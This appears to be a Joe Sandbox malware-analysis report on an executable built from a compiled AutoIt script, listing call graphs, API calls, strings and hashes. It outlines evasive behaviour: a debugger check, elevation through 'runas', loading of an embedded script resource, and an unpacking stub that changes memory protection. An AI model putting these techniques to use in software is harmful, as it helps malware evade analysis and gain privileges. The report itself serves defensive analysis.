97379->97381 97383 1a1c38 97380->97383 97382 136309 97381->97382 97382->97383 97384 136313 97382->97384 97386 135374 50 API calls 97383->97386 97385 150fa7 _W_store_winword 59 API calls 97384->97385 97387 13631e 97385->97387 97388 1a1c5d 97386->97388 97389 13635f 97387->97389 97394 1363fc 48 API calls 97387->97394 97405 1a1c86 97387->97405 97390 1363fc 48 API calls 97388->97390 97391 13636c 97389->97391 97389->97405 97392 1a1c69 97390->97392 97399 14c050 48 API calls 97391->97399 97393 136eed 48 API calls 97392->97393 97396 1a1c77 97393->97396 97397 136342 97394->97397 97395 136eed 48 API calls 97398 1a1ca8 97395->97398 97400 1363fc 48 API calls 97396->97400 97401 136eed 48 API calls 97397->97401 97402 1363fc 48 API calls 97398->97402 97403 136384 97399->97403 97400->97405 97406 136350 97401->97406 97407 1a1cb5 97402->97407 97404 141b90 48 API calls 97403->97404 97411 136394 97404->97411 97405->97395 97408 1363fc 48 API calls 97406->97408 97407->97407 97408->97389 97409 141b90 48 API calls 97409->97411 97411->97409 97412 1363fc 48 API calls 97411->97412 97413 1363d6 Mailbox 97411->97413 97565 136b68 48 API calls 97411->97565 97412->97411 97413->97290 97415 1340f2 __ftell_nolock 97414->97415 97514->97299 97518 13d7f7 48 API calls 97517->97518 97519 1361db 97518->97519 97520 136009 97519->97520 97521 136016 __ftell_nolock 97520->97521 97522 136a63 48 API calls 97521->97522 97532 13617c Mailbox 97521->97532 97524 136048 97522->97524 97525 13607e Mailbox 97524->97525 97566 1361a6 97524->97566 97526 13614f 97525->97526 97528 13ce19 48 API calls 97525->97528 97531 1364cf 48 API calls 97525->97531 97525->97532 97533 1361a6 48 API calls 97525->97533 97527 13ce19 48 API calls 97526->97527 97526->97532 97529 136170 97527->97529 97528->97525 97530 1364cf 48 API calls 97529->97530 97530->97532 97531->97525 97532->97344 97533->97525 97535 1341a9 136 API calls 97534->97535 97536 1339fe 97535->97536 97537 133a06 97536->97537 97569 17c396 97536->97569 97537->97350 97540 134252 84 API calls 97542 1a2ff0 97540->97542 97541 151c9d _free 47 API calls 97543 1a2ffd 97541->97543 97542->97541 97544 134252 84 API calls 97543->97544 97545 1a3006 97544->97545 97545->97545 97547 14f4ea 48 API calls 97546->97547 97548 136237 97547->97548 97548->97355 97550 136406 97549->97550 97551 13641f 97549->97551 97552 136eed 48 API calls 97550->97552 97553 136a63 48 API calls 97551->97553 97554 1362d1 97552->97554 97553->97554 97555 150fa7 97554->97555 97556 150fb3 97555->97556 97557 151028 97555->97557 97564 150fd8 97556->97564 97604 157c0e 47 API calls __getptd_noexit 97556->97604 97606 15103a 59 API calls 3 library calls 97557->97606 97560 151035 97560->97372 97561 150fbf 97605 156e10 8 API calls ___wstrgtold12_l 97561->97605 97563 150fca 97563->97372 97564->97372 97565->97411 97567 13bdfa 48 API calls 97566->97567 97568 1361b1 97567->97568 97568->97524 97570 134517 83 API calls 97569->97570 97571 17c405 97570->97571 97572 17c56d 94 API calls 97571->97572 97573 17c417 97572->97573 97574 1344ed 64 API calls 97573->97574 97575 17c41b 97573->97575 97576 17c432 97574->97576 97575->97540 97575->97542 97577 1344ed 64 API calls 97576->97577 97578 17c442 97577->97578 97579 1344ed 64 API calls 97578->97579 97580 17c45d 97579->97580 97581 1344ed 64 API calls 97580->97581 97582 17c478 97581->97582 97583 134517 83 API calls 97582->97583 97584 17c48f 97583->97584 97585 15395c __malloc_crt 47 API calls 97584->97585 97586 17c496 97585->97586 97587 15395c __malloc_crt 47 API calls 97586->97587 97588 17c4a0 97587->97588 97589 1344ed 64 API calls 97588->97589 97590 17c4b4 97589->97590 97591 17bf5a GetSystemTimeAsFileTime 97590->97591 97592 17c4c7 97591->97592 97593 17c4f1 97592->97593 97594 17c4dc 97592->97594 97596 17c4f7 97593->97596 97597 17c556 97593->97597 97595 151c9d _free 47 API calls 97594->97595 97600 17c4e2 97595->97600 97598 17b965 118 API calls 97596->97598 97599 151c9d _free 47 API calls 97597->97599 97601 17c54e 97598->97601 97599->97575 97602 151c9d _free 47 API calls 97600->97602 97603 151c9d _free 47 API calls 97601->97603 97602->97575 97603->97575 97604->97561 97605->97563 97606->97560

                                    Executed Functions

                                    Function 0015B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 957 15b043-15b080 call 15f8a0 960 15b082-15b084 957->960 961 15b089-15b08b 957->961 962 15b860-15b86c call 15a70c 960->962 963 15b08d-15b0a7 call 157bda call 157c0e call 156e10 961->963 964 15b0ac-15b0d9 961->964 963->962 966 15b0e0-15b0e7 964->966 967 15b0db-15b0de 964->967 972 15b105 966->972 973 15b0e9-15b100 call 157bda call 157c0e call 156e10 966->973 967->966 971 15b10b-15b110 967->971 975 15b112-15b11c call 15f82f 971->975 976 15b11f-15b12d call 163bf2 971->976 972->971 1000 15b851-15b854 973->1000 975->976 987 15b133-15b145 976->987 988 15b44b-15b45d 976->988 987->988 991 15b14b-15b183 call 157a0d GetConsoleMode 987->991 992 15b463-15b473 988->992 993 15b7b8-15b7d5 WriteFile 988->993 991->988 1014 15b189-15b18f 991->1014 998 15b479-15b484 992->998 999 15b55a-15b55f 992->999 995 15b7d7-15b7df 993->995 996 15b7e1-15b7e7 GetLastError 993->996 1001 15b7e9 995->1001 996->1001 1005 15b81b-15b833 998->1005 1006 15b48a-15b49a 998->1006 1002 15b565-15b56e 999->1002 1003 15b663-15b66e 999->1003 1013 15b85e-15b85f 1000->1013 1011 15b7ef-15b7f1 1001->1011 1002->1005 1012 15b574 1002->1012 1003->1005 1010 15b674 1003->1010 1008 15b835-15b838 1005->1008 1009 15b83e-15b84e call 157c0e call 157bda 1005->1009 1007 15b4a0-15b4a3 1006->1007 1015 15b4a5-15b4be 1007->1015 1016 15b4e9-15b520 WriteFile 1007->1016 1008->1009 1017 15b83a-15b83c 1008->1017 1009->1000 1018 15b67e-15b693 1010->1018 1020 15b856-15b85c 1011->1020 1021 15b7f3-15b7f5 1011->1021 1022 15b57e-15b595 1012->1022 1013->962 1023 15b191-15b193 1014->1023 1024 15b199-15b1bc GetConsoleCP 1014->1024 1027 15b4c0-15b4ca 1015->1027 1028 15b4cb-15b4e7 1015->1028 1016->996 1029 15b526-15b538 1016->1029 1017->1013 1030 15b699-15b69b 1018->1030 1020->1013 1021->1005 1032 15b7f7-15b7fc 1021->1032 1033 15b59b-15b59e 1022->1033 1023->988 1023->1024 1025 15b440-15b446 1024->1025 1026 15b1c2-15b1ca 1024->1026 1025->1021 1034 15b1d4-15b1d6 1026->1034 1027->1028 1028->1007 1028->1016 1029->1011 1035 15b53e-15b54f 1029->1035 1036 15b69d-15b6b3 1030->1036 1037 15b6d8-15b719 WideCharToMultiByte 1030->1037 1039 15b812-15b819 call 157bed 1032->1039 1040 15b7fe-15b810 call 157c0e call 157bda 1032->1040 1041 15b5a0-15b5b6 1033->1041 1042 15b5de-15b627 WriteFile 1033->1042 1045 15b1dc-15b1fe 1034->1045 1046 15b36b-15b36e 1034->1046 1035->1006 1047 15b555 1035->1047 1048 15b6b5-15b6c4 1036->1048 1049 15b6c7-15b6d6 1036->1049 1037->996 1051 15b71f-15b721 1037->1051 1039->1000 1040->1000 1053 15b5cd-15b5dc 1041->1053 1054 15b5b8-15b5ca 1041->1054 1042->996 1044 15b62d-15b645 1042->1044 1044->1011 1056 15b64b-15b658 1044->1056 1057 15b217-15b223 call 151688 1045->1057 1058 15b200-15b215 1045->1058 1059 15b375-15b3a2 1046->1059 1060 15b370-15b373 1046->1060 1047->1011 1048->1049 1049->1030 1049->1037 1061 15b727-15b75a WriteFile 1051->1061 1053->1033 1053->1042 1054->1053 1056->1022 1063 15b65e 1056->1063 1079 15b225-15b239 1057->1079 1080 15b269-15b26b 1057->1080 1064 15b271-15b283 call 1640f7 1058->1064 1066 15b3a8-15b3ab 1059->1066 1060->1059 1060->1066 1067 15b75c-15b776 1061->1067 1068 15b77a-15b78e GetLastError 1061->1068 1063->1011 1084 15b435-15b43b 1064->1084 1085 15b289 1064->1085 1072 15b3b2-15b3c5 call 165884 1066->1072 1073 15b3ad-15b3b0 1066->1073 1067->1061 1075 15b778 1067->1075 1070 15b794-15b796 1068->1070 1070->1001 1078 15b798-15b7b0 1070->1078 1072->996 1090 15b3cb-15b3d5 1072->1090 1073->1072 1081 15b407-15b40a 1073->1081 1075->1070 1078->1018 1086 15b7b6 1078->1086 1088 15b412-15b42d 1079->1088 1089 15b23f-15b254 call 1640f7 1079->1089 1080->1064 1081->1034 1087 15b410 1081->1087 1084->1001 1091 15b28f-15b2c4 WideCharToMultiByte 1085->1091 1086->1011 1087->1084 1088->1084 1089->1084 1099 15b25a-15b267 1089->1099 1093 15b3d7-15b3ee call 165884 1090->1093 1094 15b3fb-15b401 1090->1094 1091->1084 1095 15b2ca-15b2f0 WriteFile 1091->1095 1093->996 1102 15b3f4-15b3f5 1093->1102 1094->1081 1095->996 1098 15b2f6-15b30e 1095->1098 1098->1084 1101 15b314-15b31b 1098->1101 1099->1091 1101->1094 1103 15b321-15b34c WriteFile 1101->1103 1102->1094 1103->996 1104 15b352-15b359 1103->1104 1104->1084 1105 15b35f-15b366 1104->1105 1105->1094
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d8dc7c53a9cfbbee8a05ebc9d832d2a00979b6a4463247026996ac576961ad50
                                    • Instruction ID: 0a3b85a597aad676b61ead9255bf1313c1b3ef77bc1e328f7a8570e0267f179a
                                    • Opcode Fuzzy Hash: d8dc7c53a9cfbbee8a05ebc9d832d2a00979b6a4463247026996ac576961ad50
                                    • Instruction Fuzzy Hash: C3325C75B06228CFCB258F14DC816E9B7B5FF4A311F1841D9E81AABA91D7309E84CF52
                                    Function 00133D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00133AA3,?), ref: 00133D45
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00133AA3,?), ref: 00133D57
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,001F1148,001F1130,?,?,?,?,00133AA3,?), ref: 00133DC8
                                      • Part of subcall function 00136430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00133DEE,001F1148,?,?,?,?,?,00133AA3,?), ref: 00136471
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00133AA3,?), ref: 00133E48
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001E28F4,00000010), ref: 001A1CCE
                                    • SetCurrentDirectoryW.KERNEL32(?,001F1148,?,?,?,?,?,00133AA3,?), ref: 001A1D06
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001CDAB4,001F1148,?,?,?,?,?,00133AA3,?), ref: 001A1D89
                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00133AA3), ref: 001A1D90
                                      • Part of subcall function 00133E6E: GetSysColorBrush.USER32(0000000F), ref: 00133E79
                                      • Part of subcall function 00133E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00133E88
                                      • Part of subcall function 00133E6E: LoadIconW.USER32(00000063), ref: 00133E9E
                                      • Part of subcall function 00133E6E: LoadIconW.USER32(000000A4), ref: 00133EB0
                                      • Part of subcall function 00133E6E: LoadIconW.USER32(000000A2), ref: 00133EC2
                                      • Part of subcall function 00133E6E: RegisterClassExW.USER32(?), ref: 00133F30
                                      • Part of subcall function 001336B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001336E6
                                      • Part of subcall function 001336B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00133707
                                      • Part of subcall function 001336B8: ShowWindow.USER32(00000000,?,?,?,?,00133AA3,?), ref: 0013371B
                                      • Part of subcall function 001336B8: ShowWindow.USER32(00000000,?,?,?,?,00133AA3,?), ref: 00133724
                                      • Part of subcall function 00134FFC: _memset.LIBCMT ref: 00135022
                                      • Part of subcall function 00134FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001350CB
                                    Strings
                                    • runas, xrefs: 001A1D84
                                    • This is a third-party compiled AutoIt script., xrefs: 001A1CC8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 438480954-3287110873
                                    • Opcode ID: 47f324d5b23d5a56a3e46b1c92b821a835737cd92dc1c08e6710c854f0f4f6e6
                                    • Instruction ID: 20ae84055547ea8513e9dc8c95c4bbd0b634f4f7ac3f3ef879a8a0b3cfd61d57
                                    • Opcode Fuzzy Hash: 47f324d5b23d5a56a3e46b1c92b821a835737cd92dc1c08e6710c854f0f4f6e6
                                    • Instruction Fuzzy Hash: 2851D431A08248FACB15ABF1EC45EFE7B79AB25B54F004168F651A21A2DB744A85CB21
                                    Function 00133742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1173 133742-133762 1175 1337c2-1337c4 1173->1175 1176 133764-133767 1173->1176 1175->1176 1177 1337c6 1175->1177 1178 133769-133770 1176->1178 1179 1337c8 1176->1179 1180 1337ab-1337b3 NtdllDefWindowProc_W 1177->1180 1183 133776-13377b 1178->1183 1184 13382c-133834 PostQuitMessage 1178->1184 1181 1a1e00-1a1e2e call 132ff6 call 14e312 1179->1181 1182 1337ce-1337d1 1179->1182 1191 1337b9-1337bf 1180->1191 1220 1a1e33-1a1e3a 1181->1220 1185 1337d3-1337d4 1182->1185 1186 1337f6-13381d SetTimer RegisterClipboardFormatW 1182->1186 1188 1a1e88-1a1e9c call 174ddd 1183->1188 1189 133781-133783 1183->1189 1190 1337f2-1337f4 1184->1190 1192 1a1da3-1a1da6 1185->1192 1193 1337da-1337ed KillTimer call 133847 call 13390f 1185->1193 1186->1190 1195 13381f-13382a CreatePopupMenu 1186->1195 1188->1190 1214 1a1ea2 1188->1214 1196 133836-133845 call 14eb83 1189->1196 1197 133789-13378e 1189->1197 1190->1191 1199 1a1da8-1a1daa 1192->1199 1200 1a1ddc-1a1dfb MoveWindow 1192->1200 1193->1190 1195->1190 1196->1190 1203 1a1e6d-1a1e74 1197->1203 1204 133794-133799 1197->1204 1207 1a1dcb-1a1dd7 SetFocus 1199->1207 1208 1a1dac-1a1daf 1199->1208 1200->1190 1203->1180 1210 1a1e7a-1a1e83 call 16a5f3 1203->1210 1212 1a1e58-1a1e68 call 1755bd 1204->1212 1213 13379f-1337a5 1204->1213 1207->1190 1208->1213 1216 1a1db5-1a1dc6 call 132ff6 1208->1216 1210->1180 1212->1190 1213->1180 1213->1220 1214->1180 1216->1190 1220->1180 1224 1a1e40-1a1e53 call 133847 call 134ffc 1220->1224 1224->1180
                                    APIs
                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 001337B3
                                    • KillTimer.USER32(?,00000001), ref: 001337DD
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00133800
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0013380B
                                    • CreatePopupMenu.USER32 ref: 0013381F
                                    • PostQuitMessage.USER32(00000000), ref: 0013382E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                    • String ID: TaskbarCreated
                                    • API String ID: 157504867-2362178303
                                    • Opcode ID: ae537024f7e958e7ed0c0ac298fb0a88d83005594a95804fe61ced392d7be8b9
                                    • Instruction ID: 9a48a09b215ed129a26a9b8369350494aeca39adfb85a7c53504ad3b7a3293db
                                    • Opcode Fuzzy Hash: ae537024f7e958e7ed0c0ac298fb0a88d83005594a95804fe61ced392d7be8b9
                                    • Instruction Fuzzy Hash: 99415CF910424AFBDB18AF68ED4EF7A3795F710300F040225FA26D25A1DB709E80D769
                                    Function 0014DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1241 14ddc0-14de4f call 13d7f7 GetVersionExW call 136a63 call 14dfb4 call 136571 1250 14de55-14de56 1241->1250 1251 1a24c8-1a24cb 1241->1251 1254 14de92-14dea2 call 14df77 1250->1254 1255 14de58-14de63 1250->1255 1252 1a24cd 1251->1252 1253 1a24e4-1a24e8 1251->1253 1256 1a24d0 1252->1256 1257 1a24ea-1a24f3 1253->1257 1258 1a24d3-1a24dc 1253->1258 1268 14dea4-14dec1 GetCurrentProcess call 14df5f 1254->1268 1269 14dec7-14dee1 1254->1269 1259 1a244e-1a2454 1255->1259 1260 14de69-14de6b 1255->1260 1256->1258 1257->1256 1264 1a24f5-1a24f8 1257->1264 1258->1253 1262 1a245e-1a2464 1259->1262 1263 1a2456-1a2459 1259->1263 1265 1a2469-1a2475 1260->1265 1266 14de71-14de74 1260->1266 1262->1254 1263->1254 1264->1258 1270 1a247f-1a2485 1265->1270 1271 1a2477-1a247a 1265->1271 1272 14de7a-14de89 1266->1272 1273 1a2495-1a2498 1266->1273 1268->1269 1292 14dec3 1268->1292 1275 14df31-14df3b GetSystemInfo 1269->1275 1276 14dee3-14def7 call 14e00c 1269->1276 1270->1254 1271->1254 1277 1a248a-1a2490 1272->1277 1278 14de8f 1272->1278 1273->1254 1279 1a249e-1a24b3 1273->1279 1281 14df0e-14df1a 1275->1281 1289 14df29-14df2f GetSystemInfo 1276->1289 1290 14def9-14df01 call 14dff4 GetNativeSystemInfo 1276->1290 1277->1254 1278->1254 1283 1a24bd-1a24c3 1279->1283 1284 1a24b5-1a24b8 1279->1284 1285 14df21-14df26 1281->1285 1286 14df1c-14df1f FreeLibrary 1281->1286 1283->1254 1284->1254 1286->1285 1291 14df03-14df07 1289->1291 1290->1291 1291->1281 1295 14df09-14df0c FreeLibrary 1291->1295 1292->1269 1295->1281
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0014DDEC
                                    • GetCurrentProcess.KERNEL32(00000000,001CDC38,?,?), ref: 0014DEAC
                                    • GetNativeSystemInfo.KERNELBASE(?,001CDC38,?,?), ref: 0014DF01
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0014DF0C
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0014DF1F
                                    • GetSystemInfo.KERNEL32(?,001CDC38,?,?), ref: 0014DF29
                                    • GetSystemInfo.KERNEL32(?,001CDC38,?,?), ref: 0014DF35
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                    • String ID:
                                    • API String ID: 3851250370-0
                                    • Opcode ID: c00a138be15a429d0ea578b9f0250edda24178dd6150d0dbfad58339711155db
                                    • Instruction ID: b0a6ba95aadc62f2410261152c0d2dc701abc9d0e9018f991e6f0f4cb5b77dd9
                                    • Opcode Fuzzy Hash: c00a138be15a429d0ea578b9f0250edda24178dd6150d0dbfad58339711155db
                                    • Instruction Fuzzy Hash: 7A61AFB180A384DFCF15CF68A8C11E97FB4AF2A300B1989D9D845AF217D734C949CB65
                                    Function 0013406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1343 13406b-134083 CreateStreamOnHGlobal 1344 1340a3-1340a6 1343->1344 1345 134085-13409c FindResourceExW 1343->1345 1346 1340a2 1345->1346 1347 1a4f16-1a4f25 LoadResource 1345->1347 1346->1344 1347->1346 1348 1a4f2b-1a4f39 SizeofResource 1347->1348 1348->1346 1349 1a4f3f-1a4f4a LockResource 1348->1349 1349->1346 1350 1a4f50-1a4f6e 1349->1350 1350->1346
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0013407B
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0013449E,?,?,00000000,00000001), ref: 00134092
                                    • LoadResource.KERNEL32(?,00000000,?,?,0013449E,?,?,00000000,00000001,?,?,?,?,?,?,001341FB), ref: 001A4F1A
                                    • SizeofResource.KERNEL32(?,00000000,?,?,0013449E,?,?,00000000,00000001,?,?,?,?,?,?,001341FB), ref: 001A4F2F
                                    • LockResource.KERNEL32(0013449E,?,?,0013449E,?,?,00000000,00000001,?,?,?,?,?,?,001341FB,00000000), ref: 001A4F42
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: be85e4fc97b537dceec4261dd309a0a92c434c90d65d72f83b0b9ef9458c1ae8
                                    • Instruction ID: f1c8f56956a57704c010a8ae23695e6d86336f5ed16b80a9a4a74a894e843b37
                                    • Opcode Fuzzy Hash: be85e4fc97b537dceec4261dd309a0a92c434c90d65d72f83b0b9ef9458c1ae8
                                    • Instruction Fuzzy Hash: 6A115E71300701BFE7299B65EC48F677BB9EBC5B51F10426CF602966A0EB71EC40CA20
                                    Function 0023AF60 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 0023B09A
                                    • GetProcAddress.KERNEL32(?,00233FF9), ref: 0023B0B8
                                    • ExitProcess.KERNEL32(?,00233FF9), ref: 0023B0C9
                                    • VirtualProtect.KERNELBASE(00130000,00001000,00000004,?,00000000), ref: 0023B117
                                    • VirtualProtect.KERNELBASE(00130000,00001000), ref: 0023B12C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: be0caa61d92df7c1f7ffadc7a4585d7697e4c6fdecc31274fe668915a1b0126a
                                    • Instruction ID: 66f6f51448d2fbba0fe0fbb516a5c5b78db99c02053e95dbf0b37237d337780f
                                    • Opcode Fuzzy Hash: be0caa61d92df7c1f7ffadc7a4585d7697e4c6fdecc31274fe668915a1b0126a
                                    • Instruction Fuzzy Hash: FA5147F2A343534BD7268EB8CCC0661B7A4EB11320F280739D6F1CB7C5E7A5582687A1
                                    Function 00176CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,001A2F49), ref: 00176CB9
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00176CCA
                                    • FindClose.KERNEL32(00000000), ref: 00176CDA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
